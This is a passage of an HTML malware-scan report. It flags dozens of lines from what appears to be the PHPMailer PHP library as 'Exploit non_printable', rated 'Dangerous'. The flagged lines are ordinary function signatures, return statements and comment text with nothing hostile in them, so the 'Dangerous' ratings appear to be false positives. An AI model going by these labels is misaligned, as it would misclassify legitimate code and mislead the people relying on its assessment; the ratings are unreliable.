</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
